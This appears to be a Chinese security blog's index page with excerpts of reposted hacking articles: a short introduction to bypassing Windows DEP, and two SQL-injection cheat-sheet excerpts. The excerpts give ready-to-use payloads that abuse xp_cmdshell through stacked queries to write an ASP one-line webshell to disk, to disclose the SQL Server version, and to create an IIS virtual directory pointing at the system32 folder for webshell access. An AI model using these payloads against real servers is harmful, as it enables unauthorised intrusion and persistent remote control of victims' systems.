鬼仔's Blog

鬼仔注：跟 上个 一样，CS3 下测试成功，但是 CS2 下没有测试，我以前一直用的 CS 绿色版，懒得再去下个 CS2 测试了。

来源：Security vulnerabilities

阅读全文 »

鬼仔注：CS3 下测试成功，但是 CS2 下没有测试，我以前一直用的 CS 绿色版，懒得再去下个 CS2 测试了。

来源：Security vulnerabilities

阅读全文 »

来源：Security vulnerabilities

阅读全文 »

Author: axis
Date: 2007-04-27
http://www.ph4nt0m.org

DEP（数据执行保护），是windows针对溢出的一种保护措施，分软dep和硬dep，其中硬dep是需要cpu支持的，比较新的处理器一般都支持这个选项，可以在bios里去打开。简单来说，就是堆栈不可执行了，所以一般的在堆栈里执行shellcode的exploit，会攻击失败。

bypass dep也不是新东西了，目前最好的一篇文档是skape和skywing发在uninformed上的一篇。
http://www.uninformed.org/?v=2&a=4&t=txt

这篇文档写的很好，任何想学习或者研究bypass dep的人，都应该去仔细阅读这份文档。

这次由于metasploit里的dns 阅读全文 »

鬼仔注：一样老文，存档。其实文中很多东西以前都曾经发过，不过这个是总结性的。发一下，方便我自己，也方便大家查阅。

来源：H4x0r's Blog

1、 用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2、 显示SQL系统版本：
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
阅读全文 »

鬼仔注：老文，刚才发 上篇 文章的时候想起来这篇文章，以前没发过，保存一下。

来源：H4x0r's Blog

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
阅读全文 »